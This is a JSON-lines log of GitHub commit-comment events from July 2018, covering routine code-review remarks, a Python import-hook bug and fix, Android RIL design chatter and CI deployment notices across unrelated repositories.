{"id":"7907067574","type":"CommitCommentEvent","actor":{"login":"maryamyasaei"},"repo":{"name":"evenset/ketabdan-project"},"payload":{"comment":{"id":29567601,"position":null,"line":null,"path":null,"commit_id":"8ac80176d5cab8594231a34f9433b95e6292018c","created_at":"2018-07-02T14:35:04Z","updated_at":"2018-07-02T14:35:04Z","author_association":"COLLABORATOR","body":"![screenshot from 2018-07-03 00-25-59](https://user-images.githubusercontent.com/28941044/42170099-e8614672-7e58-11e8-897e-b47e896a7f77.png)\r\n"}},"created_at":"2018-07-02T14:35:04Z"}
{"id":"7907067663","type":"CommitCommentEvent","actor":{"login":"Ckingbigdata"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29567602,"position":10,"line":10,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T14:35:06Z","updated_at":"2018-07-02T14:35:06Z","author_association":"NONE","body":"Sorry..still getting used to this. The last line in comment, should be first line of code."}},"created_at":"2018-07-02T14:35:06Z"}
{"id":"7907079369","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29567645,"position":11,"line":27,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-02T14:37:06Z","updated_at":"2018-07-02T14:37:06Z","author_association":"NONE","body":"Я здесь имела ввиду следующее - если код-клиент вызовет публичный метод с параметрами start >= end), что будет в этом случае? Код-клиент будет пребывать в заблуждении, что массив отсортитован?"}},"created_at":"2018-07-02T14:37:06Z"}
{"id":"7907083010","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567659,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:37:43Z","updated_at":"2018-07-02T14:37:43Z","author_association":"OWNER","body":"Just ditch stock rild, libril. Sockets are ditched in O and replaced by slots, so old RIL blobs are useless"}},"created_at":"2018-07-02T14:37:43Z"}
{"id":"7907083399","type":"CommitCommentEvent","actor":{"login":"rallytime"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29567660,"position":null,"line":null,"path":null,"commit_id":"cd051f0f4b9270d7fb1fa8631a0778445e4b0c0c","created_at":"2018-07-02T14:37:47Z","updated_at":"2018-07-02T14:37:47Z","author_association":"CONTRIBUTOR","body":"Hi @cristinapauna the 2016.11 branch is no longer receiving non-CVE fixes. This fix has been back-ported to the 2018.3 branch, however. The fix will be available in the 2018.3.3 release of Salt."}},"created_at":"2018-07-02T14:37:47Z"}
{"id":"7907083474","type":"CommitCommentEvent","actor":{"login":"hbczzcb"},"repo":{"name":"hbczzcb/hello-world"},"payload":{"comment":{"id":29567661,"position":null,"line":null,"path":null,"commit_id":"4f413dcec1873c3f05585bf9c2e22077227a5b74","created_at":"2018-07-02T14:37:48Z","updated_at":"2018-07-02T14:37:48Z","author_association":"OWNER","body":"master"}},"created_at":"2018-07-02T14:37:48Z"}
{"id":"7907085185","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567664,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:38:07Z","updated_at":"2018-07-02T14:38:07Z","author_association":"OWNER","body":"We can keep old stuffs like nvitemd, modemd and phoneserver"}},"created_at":"2018-07-02T14:38:07Z"}
{"id":"7907085330","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29567665,"position":11,"line":27,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-02T14:38:09Z","updated_at":"2018-07-02T14:38:09Z","author_association":"OWNER","body":"Ааа, понял, уже придумал,как исправить"}},"created_at":"2018-07-02T14:38:09Z"}
{"id":"7907086601","type":"CommitCommentEvent","actor":{"login":"jaywinky"},"repo":{"name":"jaywinky/pre-commit-hooks"},"payload":{"comment":{"id":29567667,"position":null,"line":null,"path":null,"commit_id":"d59d3511d495fafda4c1385e913c18212de3a484","created_at":"2018-07-02T14:38:21Z","updated_at":"2018-07-02T14:38:21Z","author_association":"OWNER","body":"@asottile Not sure if doing something wrong, but getting this:\r\n\r\n```\r\nhookid: reorder-python-imports\r\n\r\nTraceback (most recent call last):\r\n  File \"/home/jaywink/.cache/pre-commit/repoxvSQGi/py_env-python2.7/bin/reorder-python-imports\", line 11, in <module>\r\n    sys.exit(main())\r\n  File \"/home/jaywink/.cache/pre-commit/repoxvSQGi/py_env-python2.7/local/lib/python2.7/site-packages/reorder_python_imports.py\", line 443, in main\r\n    application_directories=args.application_directories.split(':'),\r\n  File \"/home/jaywink/.cache/pre-commit/repoxvSQGi/py_env-python2.7/local/lib/python2.7/site-packages/reorder_python_imports.py\", line 334, in fix_file_contents\r\n    partitioned = step(partitioned)\r\n  File \"/home/jaywink/.cache/pre-commit/repoxvSQGi/py_env-python2.7/local/lib/python2.7/site-packages/reorder_python_imports.py\", line 213, in remove_imports\r\n    return list(_inner())\r\n  File \"/home/jaywink/.cache/pre-commit/repoxvSQGi/py_env-python2.7/local/lib/python2.7/site-packages/reorder_python_imports.py\", line 209, in _inner\r\n    import_obj_from_str(partition.src) not in to_remove_imports\r\n  File \"/home/jaywink/.cache/pre-commit/repoxvSQGi/py_env-python2.7/local/lib/python2.7/site-packages/aspy/refactor_imports/import_obj.py\", line 189, in import_obj_from_str\r\n    return ast_type_to_import_type[type(ast_obj)](ast_obj)\r\nKeyError: <class '_ast.Expr'>\r\n```\r\n\r\nConfig:\r\n\r\n```\r\n- repo: https://github.com/asottile/reorder_python_imports\r\n  rev: master\r\n  hooks:\r\n  - id: reorder-python-imports\r\n    args:\r\n      - --add-import=\"from __future__ import unicode_literals\"\r\n```\r\n\r\nPython 2.7\r\n\r\nAny idea or should I log an issue? "}},"created_at":"2018-07-02T14:38:21Z"}
{"id":"7907089703","type":"CommitCommentEvent","actor":{"login":"amanjnegahdar"},"repo":{"name":"zhukov/webogram"},"payload":{"comment":{"id":29567671,"position":null,"line":null,"path":null,"commit_id":"c5fc5107cad2a476a03d7ce8427f1def41c20568","created_at":"2018-07-02T14:38:52Z","updated_at":"2018-07-02T14:38:52Z","author_association":"NONE","body":"\r\n     }\r\n   })\r\n + +    var date = $unlock('date')\r\n+    return function (timestamp, extended) {\r\n+      var ticks = timestamp * 1000\r\n+     +    }\r\n+  })\r\n+\r\n     var cachedDates = {}\r\n    \r\n"}},"created_at":"2018-07-02T14:38:52Z"}
{"id":"7907090173","type":"CommitCommentEvent","actor":{"login":"jellycode"},"repo":{"name":"ctf0/laravel-mix-versionhash"},"payload":{"comment":{"id":29567672,"position":null,"line":null,"path":null,"commit_id":"1ec0267004e8780cc98d7d74fd5385177f302783","created_at":"2018-07-02T14:38:57Z","updated_at":"2018-07-02T14:38:57Z","author_association":"CONTRIBUTOR","body":"Everything checks out, looks good!"}},"created_at":"2018-07-02T14:38:57Z"}
{"id":"7907093625","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567682,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:39:32Z","updated_at":"2018-07-02T14:39:32Z","author_association":"CONTRIBUTOR","body":"So what load libreference ril?"}},"created_at":"2018-07-02T14:39:32Z"}
{"id":"7907094259","type":"CommitCommentEvent","actor":{"login":"valeria1011"},"repo":{"name":"valeria1011/My-Wallet-V3"},"payload":{"comment":{"id":29567685,"position":17,"line":11,"path":"tests/signer.spec.js","commit_id":"499209337e2447fdac9442fc86274f8b671a9b90","created_at":"2018-07-02T14:39:39Z","updated_at":"2018-07-02T14:39:39Z","author_association":"OWNER","body":"[VBox.log](https://github.com/valeria1011/My-Wallet-V3/files/2155624/VBox.log)\r\n"}},"created_at":"2018-07-02T14:39:39Z"}
{"id":"7907094849","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/jupyter_enterprise_gateway-feedstock"},"payload":{"comment":{"id":29567687,"position":null,"line":null,"path":null,"commit_id":"635999c7c790823902005508b0b38143af499c2c","created_at":"2018-07-02T14:39:45Z","updated_at":"2018-07-02T14:39:45Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @liukun1016 were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @liukun1016 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-02T14:39:45Z"}
{"id":"7907099479","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567706,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:40:32Z","updated_at":"2018-07-02T14:40:32Z","author_association":"OWNER","body":"rild of course. Our libreference-ril_sp not AOSP libreference-ril"}},"created_at":"2018-07-02T14:40:32Z"}
{"id":"7907099520","type":"CommitCommentEvent","actor":{"login":"drdanz"},"repo":{"name":"robotology-playground/sharedlibpp"},"payload":{"comment":{"id":29567707,"position":39,"line":39,"path":"src/CMakeLists.txt","commit_id":"c0b884cbb67138278dc02a3fabfdfa74e7e15341","created_at":"2018-07-02T14:40:32Z","updated_at":"2018-07-02T14:40:32Z","author_association":"MEMBER","body":"@traversaro can I skip the `if(UNIX)` check with that variable?"}},"created_at":"2018-07-02T14:40:32Z"}
{"id":"7907108171","type":"CommitCommentEvent","actor":{"login":"robinj77"},"repo":{"name":"robinj77/sample-cloud-native-toolchain-tutorial-20180702081541758"},"payload":{"comment":{"id":29567720,"position":null,"line":null,"path":null,"commit_id":"cc547a2ae9ee0b74f01025ccfc7c12d313761d50","created_at":"2018-07-02T14:42:02Z","updated_at":"2018-07-02T14:42:02Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/1321a611-572d-4557-9432-ab14cad2d78d?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180702081541758\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8418be88-c00b-47af-a2eb-b5ed0c361950?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180702081541758\") deployed [sample-cloud-native-toolchain-tutorial-20180702081541758](https://github.com/robinj77/sample-cloud-native-toolchain-tutorial-20180702081541758/releases/tag/deploy-ibm-yp-eu-gb-robin_james-ie.ibm.com-test-20180702-144200 \"deploy-ibm-yp-eu-gb-robin_james-ie.ibm.com-test-20180702-144200\") to [test](https://console.bluemix.net/apps/d672919f-a3ba-4b6a-aa9b-e5f6e3adf1b5?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:robin_james@ie.ibm.com:test\"), including this commit"}},"created_at":"2018-07-02T14:42:02Z"}
{"id":"7907109109","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29567722,"position":23,"line":190,"path":"ruby_fourth.rb","commit_id":"87f507d734ecd8cc590a053c9943e61f683b4da1","created_at":"2018-07-02T14:42:11Z","updated_at":"2018-07-02T14:42:11Z","author_association":"COLLABORATOR","body":"@tomoharutsutsumi YESですー"}},"created_at":"2018-07-02T14:42:11Z"}
{"id":"7907110693","type":"CommitCommentEvent","actor":{"login":"lordstyx"},"repo":{"name":"DataTables/RowGroup"},"payload":{"comment":{"id":29567724,"position":84,"line":227,"path":"js/dataTables.rowGroup.js","commit_id":"a8a3e760ae92915ef6f9f56a7c92603a17cd039f","created_at":"2018-07-02T14:42:28Z","updated_at":"2018-07-02T14:42:28Z","author_association":"NONE","body":"FYI: group can at this point also be an object, containing display, sort, filter and type properties, instead of just a value.\r\nIn that case, you should propably take group.display ?"}},"created_at":"2018-07-02T14:42:28Z"}
{"id":"7907114816","type":"CommitCommentEvent","actor":{"login":"lordstyx"},"repo":{"name":"DataTables/RowGroup"},"payload":{"comment":{"id":29567731,"position":103,"line":246,"path":"js/dataTables.rowGroup.js","commit_id":"a8a3e760ae92915ef6f9f56a7c92603a17cd039f","created_at":"2018-07-02T14:43:12Z","updated_at":"2018-07-02T14:43:12Z","author_association":"NONE","body":"header()[this.c.dataSrc[j]] only works when your dataset consists of arrays, not when they are objects."}},"created_at":"2018-07-02T14:43:12Z"}
{"id":"7907117426","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29567734,"position":null,"line":null,"path":null,"commit_id":"1576300374182a2e7f9f4894fcceb89fc40e87cc","created_at":"2018-07-02T14:43:38Z","updated_at":"2018-07-02T14:43:38Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-22](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-22).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-22-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-02T14:43:38Z"}
{"id":"7907118425","type":"CommitCommentEvent","actor":{"login":"sergepetrenko"},"repo":{"name":"tarantool/tarantool"},"payload":{"comment":{"id":29567739,"position":null,"line":null,"path":null,"commit_id":"ec1e0e76b816a2a36c529a071b256effb3ad797b","created_at":"2018-07-02T14:43:48Z","updated_at":"2018-07-02T14:43:48Z","author_association":"NONE","body":"@bigbes, thank you for the comment.\r\nI made all the changes accordingly."}},"created_at":"2018-07-02T14:43:48Z"}
{"id":"7907119211","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567741,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:43:56Z","updated_at":"2018-07-02T14:43:56Z","author_association":"CONTRIBUTOR","body":"So we let O rild load our libreference-ril_sp.\r\nThen what the ... is slots?"}},"created_at":"2018-07-02T14:43:56Z"}
{"id":"7907119566","type":"CommitCommentEvent","actor":{"login":"tinavaz"},"repo":{"name":"CGAL/cgal-public-dev"},"payload":{"comment":{"id":29567743,"position":35,"line":303,"path":"Heat_method_3/include/CGAL/Heat_method_3/Intrinsic_Delaunay_Triangulation_3.h","commit_id":"965e6311a8407cefed3c6eaca5d7bb0796a26cf3","created_at":"2018-07-02T14:44:00Z","updated_at":"2018-07-02T14:44:00Z","author_association":"NONE","body":"No particular reason. It's the solution that I could get working and was going to ask you about different possible solutions in CGAL. I need to read through the parameterization page again to understand it better, but I believe that the initial solution you stated (storing a (u,v) per halfedge) would work as we simply need the 2d coordinate for each vertex and then could iterate over the copied mesh the same way to get the vertex descriptors in the original heat method. "}},"created_at":"2018-07-02T14:44:00Z"}
{"id":"7907121755","type":"CommitCommentEvent","actor":{"login":"tinavaz"},"repo":{"name":"CGAL/cgal-public-dev"},"payload":{"comment":{"id":29567746,"position":72,"line":340,"path":"Heat_method_3/include/CGAL/Heat_method_3/Intrinsic_Delaunay_Triangulation_3.h","commit_id":"965e6311a8407cefed3c6eaca5d7bb0796a26cf3","created_at":"2018-07-02T14:44:23Z","updated_at":"2018-07-02T14:44:23Z","author_association":"NONE","body":"typo. I'll fix that. Thanks!\r\n"}},"created_at":"2018-07-02T14:44:23Z"}
{"id":"7907126639","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29567753,"position":72,"line":96,"path":"ruby_fourth.rb","commit_id":"eb5b412f4f171049bd23bf82d82c8a3a34fbac61","created_at":"2018-07-02T14:45:14Z","updated_at":"2018-07-02T14:45:14Z","author_association":"COLLABORATOR","body":"@tomoharutsutsumi む、ごめん。ちょっと伝えようとしていることが私に伝わっていない。\r\n\r\n結果、「 `elsif index % 2 != 0` で当然だ」と伝えてくれていると思っていいかな。"}},"created_at":"2018-07-02T14:45:14Z"}
{"id":"7907128439","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"ncox2011/ContactPractice"},"payload":{"comment":{"id":29567758,"position":null,"line":null,"path":null,"commit_id":"4d62b9b470b7a85a63a7bba2d540b263ef9c9877","created_at":"2018-07-02T14:45:32Z","updated_at":"2018-07-02T14:45:32Z","author_association":"NONE","body":"This is great! If you feel like revisiting it, check on the way it tend to double-add the contacts over again. (I can show you later if you want!)"}},"created_at":"2018-07-02T14:45:32Z"}
{"id":"7907129919","type":"CommitCommentEvent","actor":{"login":"vladdimakov"},"repo":{"name":"maxkimlyk/software-renderer"},"payload":{"comment":{"id":29567762,"position":3,"line":39,"path":"src/canvas.h","commit_id":"114b19faca4eaf211259111a261ffcd9ec646b92","created_at":"2018-07-02T14:45:47Z","updated_at":"2018-07-02T14:45:47Z","author_association":"NONE","body":"Che, pacany, anime?"}},"created_at":"2018-07-02T14:45:47Z"}
{"id":"7907129953","type":"CommitCommentEvent","actor":{"login":"tinavaz"},"repo":{"name":"CGAL/cgal-public-dev"},"payload":{"comment":{"id":29567763,"position":71,"line":339,"path":"Heat_method_3/include/CGAL/Heat_method_3/Intrinsic_Delaunay_Triangulation_3.h","commit_id":"965e6311a8407cefed3c6eaca5d7bb0796a26cf3","created_at":"2018-07-02T14:45:47Z","updated_at":"2018-07-02T14:45:47Z","author_association":"NONE","body":"I can change it to 2 points. I was doing this for consistency for the heat method, but I can just add a check in the heat method code. That will be a bit faster. Thank you"}},"created_at":"2018-07-02T14:45:47Z"}
{"id":"7907130405","type":"CommitCommentEvent","actor":{"login":"asottile"},"repo":{"name":"jaywinky/pre-commit-hooks"},"payload":{"comment":{"id":29567765,"position":null,"line":null,"path":null,"commit_id":"d59d3511d495fafda4c1385e913c18212de3a484","created_at":"2018-07-02T14:45:52Z","updated_at":"2018-07-02T14:45:52Z","author_association":"NONE","body":"Hmmm! Looks like it is unhappy with some code. If you could track down the file (and its contents) that would help a ton :\r\n\r\n`git ls-files -- '*.py' | xargs -I{} bash -c 'reorder-python-imports |& grep -q KeyError && echo {}' `\r\n\r\nOr if it is a public repo linking that would be helpful :) "}},"created_at":"2018-07-02T14:45:52Z"}
{"id":"7907130536","type":"CommitCommentEvent","actor":{"login":"hhyyrylainen"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29567766,"position":51,"line":400,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"9f86695fce5150d27eb4ee5da526ff4802d3d61c","created_at":"2018-07-02T14:45:54Z","updated_at":"2018-07-02T14:45:54Z","author_association":"CONTRIBUTOR","body":"Shouldn't the 100 here also be a constant? (or at least `MAX_SPECIES_FEAR` / 2)"}},"created_at":"2018-07-02T14:45:54Z"}
{"id":"7907134253","type":"CommitCommentEvent","actor":{"login":"robinj77"},"repo":{"name":"robinj77/sample-cloud-native-toolchain-tutorial-20180702081541758"},"payload":{"comment":{"id":29567778,"position":null,"line":null,"path":null,"commit_id":"cc547a2ae9ee0b74f01025ccfc7c12d313761d50","created_at":"2018-07-02T14:46:31Z","updated_at":"2018-07-02T14:46:31Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/1321a611-572d-4557-9432-ab14cad2d78d?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180702081541758\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8418be88-c00b-47af-a2eb-b5ed0c361950?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180702081541758\") deployed [sample-cloud-native-toolchain-tutorial-20180702081541758](https://github.com/robinj77/sample-cloud-native-toolchain-tutorial-20180702081541758/releases/tag/deploy-ibm-yp-eu-gb-robin_james-ie.ibm.com-prod-20180702-144625 \"deploy-ibm-yp-eu-gb-robin_james-ie.ibm.com-prod-20180702-144625\") to [prod](https://console.bluemix.net/apps/0619d63c-375b-4d22-8ad8-978c796fc62b?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:robin_james@ie.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-02T14:46:31Z"}
{"id":"7907137976","type":"CommitCommentEvent","actor":{"login":"neworderofjamie"},"repo":{"name":"BrainsOnBoard/bob_robotics"},"payload":{"comment":{"id":29567783,"position":null,"line":null,"path":null,"commit_id":"b6f5830dcf6c070eef19545c9af9afb66c87e741","created_at":"2018-07-02T14:47:10Z","updated_at":"2018-07-02T14:47:10Z","author_association":"COLLABORATOR","body":"Good spot - that would definitely not be my chosen means of adding i2c permissions! The solution I've always used is to add a file called ``/etc/udev/rules.d/90-i2c.rules`` containing ``KERNEL==”i2c-[0-7]”,MODE=”0666″`` - will correct now"}},"created_at":"2018-07-02T14:47:10Z"}
{"id":"7907138773","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_hardware_sprd"},"payload":{"comment":{"id":29567784,"position":null,"line":null,"path":null,"commit_id":"905e91f60fc55a8da5f389aa54cabc591a550110","created_at":"2018-07-02T14:47:17Z","updated_at":"2018-07-02T14:47:17Z","author_association":"OWNER","body":"Before we have rild, rild2, rildN\r\nNow we have slot1, slot2, slotN\r\n\r\nJust a simple name replacing but it kills the whole structure"}},"created_at":"2018-07-02T14:47:17Z"}
{"id":"7907141406","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29567788,"position":51,"line":400,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"9f86695fce5150d27eb4ee5da526ff4802d3d61c","created_at":"2018-07-02T14:47:44Z","updated_at":"2018-07-02T14:47:44Z","author_association":"CONTRIBUTOR","body":"I suppose yeah, good idea"}},"created_at":"2018-07-02T14:47:44Z"}
{"id":"7907142925","type":"CommitCommentEvent","actor":{"login":"simonschmeisser"},"repo":{"name":"ros-planning/moveit"},"payload":{"comment":{"id":29567792,"position":null,"line":null,"path":null,"commit_id":"62ebe86426fb353ce36830eb9a9b0630e915672d","created_at":"2018-07-02T14:48:00Z","updated_at":"2018-07-02T14:48:00Z","author_association":"CONTRIBUTOR","body":"@v4hn @rhaschke PlanningSceneMonitor::scenePublisherThread recycles its moveit_msgs::PlanningScene (for whatever reason?) so if this gets set it will never be reset back to false. So all subsequent updates will be diffs\r\n\r\nI will open a PR shortly to not recycle the message in scenePublisherThread (as this also affects full updates"}},"created_at":"2018-07-02T14:48:00Z"}
{"id":"7907143668","type":"CommitCommentEvent","actor":{"login":"asottile"},"repo":{"name":"jaywinky/pre-commit-hooks"},"payload":{"comment":{"id":29567796,"position":null,"line":null,"path":null,"commit_id":"d59d3511d495fafda4c1385e913c18212de3a484","created_at":"2018-07-02T14:48:09Z","updated_at":"2018-07-02T14:48:09Z","author_association":"NONE","body":"Oh you know what, it's the quotes I bet, yaml is a sneaky sneaky config language, you'll likely find this works better:\r\n\r\n```yaml\r\n    args:\r\n      - '--add-import=from __future__ import unicode_literals'\r\n```"}},"created_at":"2018-07-02T14:48:09Z"}
{"id":"7907151094","type":"CommitCommentEvent","actor":{"login":"lgirdwood"},"repo":{"name":"thesofproject/soft"},"payload":{"comment":{"id":29567807,"position":null,"line":null,"path":null,"commit_id":"229da95e0d5a9d8abce89a5bb3804926b74d1ba0","created_at":"2018-07-02T14:49:23Z","updated_at":"2018-07-02T14:49:23Z","author_association":"MEMBER","body":"Ok, I will close since it's not needed."}},"created_at":"2018-07-02T14:49:23Z"}
{"id":"7907156832","type":"CommitCommentEvent","actor":{"login":"asottile"},"repo":{"name":"jaywinky/pre-commit-hooks"},"payload":{"comment":{"id":29567821,"position":null,"line":null,"path":null,"commit_id":"d59d3511d495fafda4c1385e913c18212de3a484","created_at":"2018-07-02T14:50:21Z","updated_at":"2018-07-02T14:50:21Z","author_association":"NONE","body":"I should improve the error message though, so I'd still like an issue :) "}},"created_at":"2018-07-02T14:50:21Z"}
{"id":"7907157729","type":"CommitCommentEvent","actor":{"login":"letterletter"},"repo":{"name":"letterletter/eee"},"payload":{"comment":{"id":29567823,"position":null,"line":null,"path":null,"commit_id":"1b28ce3987063bc707a952af367bd4bc0ef904ee","created_at":"2018-07-02T14:50:30Z","updated_at":"2018-07-02T14:50:30Z","author_association":"OWNER","body":"\r\n![31client](https://user-images.githubusercontent.com/38952043/42170869-4cf261fc-7e4a-11e8-9663-0f735da8db18.JPG)\r\n\r\n"}},"created_at":"2018-07-02T14:50:30Z"}
{"id":"7907159235","type":"CommitCommentEvent","actor":{"login":"Mr-emeka"},"repo":{"name":"Mr-emeka/VideoJot"},"payload":{"comment":{"id":29567824,"position":null,"line":null,"path":null,"commit_id":"fdcb3b76888755ccdfa66a7f5326502a3cfe1419","created_at":"2018-07-02T14:50:45Z","updated_at":"2018-07-02T14:50:45Z","author_association":"OWNER","body":"Thanks Martins...\n\nOn Sun, Jul 1, 2018 at 8:49 PM Martins Onuoha <notifications@github.com>\nwrote:\n\n> No problem, always read the error messages properly.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Mr-emeka/VideoJot/commit/fdcb3b76888755ccdfa66a7f5326502a3cfe1419#commitcomment-29559222>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AdHsGIN8AWNxwsZYKdas3ix8MdwzEtJ-ks5uCSfEgaJpZM4U-Fy8>\n> .\n>\n\n\n-- \nLife is Venture or Nothing....\n"}},"created_at":"2018-07-02T14:50:45Z"}
{"id":"7907159806","type":"CommitCommentEvent","actor":{"login":"yaaagy"},"repo":{"name":"yaaagy/testjenkins"},"payload":{"comment":{"id":29567827,"position":null,"line":null,"path":null,"commit_id":"501b26ba4f4160346ba982dd537a55129af2aee9","created_at":"2018-07-02T14:50:51Z","updated_at":"2018-07-02T14:50:51Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-02T14:50:51Z"}
{"id":"7907164386","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29567837,"position":1,"line":19,"path":"log/src/main/java/com/axway/ats/log/appenders/ActiveDbAppender.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T14:51:36Z","updated_at":"2018-07-02T14:51:36Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T14:51:36Z"}
{"id":"7907164795","type":"CommitCommentEvent","actor":{"login":"ahakola"},"repo":{"name":"meepen/salien-bot"},"payload":{"comment":{"id":29567838,"position":null,"line":null,"path":null,"commit_id":"2047b6a9eccdb09ecea8f5d4f571d679fa658559","created_at":"2018-07-02T14:51:40Z","updated_at":"2018-07-02T14:51:40Z","author_association":"CONTRIBUTOR","body":"Lines 170 and 171 are the same."}},"created_at":"2018-07-02T14:51:40Z"}
{"id":"7907167929","type":"CommitCommentEvent","actor":{"login":"meepen"},"repo":{"name":"meepen/salien-bot"},"payload":{"comment":{"id":29567844,"position":null,"line":null,"path":null,"commit_id":"2047b6a9eccdb09ecea8f5d4f571d679fa658559","created_at":"2018-07-02T14:52:13Z","updated_at":"2018-07-02T14:52:13Z","author_association":"OWNER","body":"thanks"}},"created_at":"2018-07-02T14:52:13Z"}
{"id":"7907173071","type":"CommitCommentEvent","actor":{"login":"wkumari"},"repo":{"name":"wkumari/draft-wkumari-dnsop-extended-error"},"payload":{"comment":{"id":29567859,"position":null,"line":null,"path":null,"commit_id":"1658c797310ee7e1f8d8310c1978d93516be9038","created_at":"2018-07-02T14:53:05Z","updated_at":"2018-07-02T14:53:05Z","author_association":"OWNER","body":"Thank you, these all look good. "}},"created_at":"2018-07-02T14:53:05Z"}
{"id":"7907174618","type":"CommitCommentEvent","actor":{"login":"wborn"},"repo":{"name":"eclipse/smarthome"},"payload":{"comment":{"id":29567861,"position":169,"line":131,"path":"docs/documentation/concepts/units-of-measurement.md","commit_id":"7c3a53c83e11d50ee88afe86a16333e5d6b8713d","created_at":"2018-07-02T14:53:20Z","updated_at":"2018-07-02T14:53:20Z","author_association":"CONTRIBUTOR","body":"Celsius"}},"created_at":"2018-07-02T14:53:20Z"}
{"id":"7907175936","type":"CommitCommentEvent","actor":{"login":"captn3m0"},"repo":{"name":"Aagosh10/pincode_project"},"payload":{"comment":{"id":29567863,"position":8,"line":8,"path":"app/Http/Controllers/state_code_controller.php","commit_id":"59bbd7a3b189c18f6182c5955a592d0a5304acb4","created_at":"2018-07-02T14:53:33Z","updated_at":"2018-07-02T14:53:33Z","author_association":"NONE","body":"Please use PSR4 based classnames: https://www.php-fig.org/psr/psr-4/"}},"created_at":"2018-07-02T14:53:33Z"}
